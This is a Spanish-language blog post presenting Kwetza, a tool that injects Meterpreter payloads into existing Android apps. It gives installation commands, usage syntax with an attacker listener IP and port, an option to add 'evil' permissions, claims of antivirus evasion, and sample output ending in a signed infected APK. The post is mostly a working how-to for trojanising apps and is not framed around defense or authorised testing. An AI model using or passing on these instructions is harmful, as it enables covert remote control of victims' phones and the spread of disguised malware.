Enter Search Query:

Kwetza – Inyecta Payloads en Aplicaciones Android

Kwetza – Inyecta Payloads en Aplicaciones Android

Kwetza es una herramienta que le permite infectar una aplicación Android existente con un payload Meterpreter.

¿Qué hace?

Kwetza infecta una aplicación Android existente con plantillas de payloads personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza te permite infectar las aplicaciones de Android utilizando los permisos predeterminados de la aplicación de destino o inyectar permisos adicionales para obtener funcionalidad adicional.

Instalación:

git clone https://github.com/sensepost/kwetza.git

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:

pip install beautifulsoup4

Kwetza requiere que Apktool sea instalado y accesible a través de su PATH. Esto se puede configurar usando las instrucciones de instalación que se encuentran aquí: https://ibotpeaches.github.io/Apktool/install

Modo de uso:

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

nameOfTheApkToInfect.apk =name of the APK you wish to infect.
LHOST =IP of your listener.
LPORT =Port of your listener.
yes =include “yes” to inject additional evil perms into the app, “no” to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes

[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk

Información

Kwetza ha sido desarrollado para trabajar con Python 2.
Kwetza usará por defecto la plantilla y el keystore ubicados en la carpeta «payload» para inyectar y firmar el apk infectado.
Si desea firmar la aplicación infectada con su propio certificado, genere un nuevo keystore y colóquelo en la carpeta «payload» y cambie el nombre al keystore existente o cambie la referencia en kwetza.py.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el keystore predeterminado es, «password».

Descarga: https://github.com/sensepost/kwetza

 

Comentarios

Comentarios

17 julio, 2017

Posts Relacionados

0 comentarios

Comentarios en: Kwetza – Inyecta Payloads en Aplicaciones Android

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *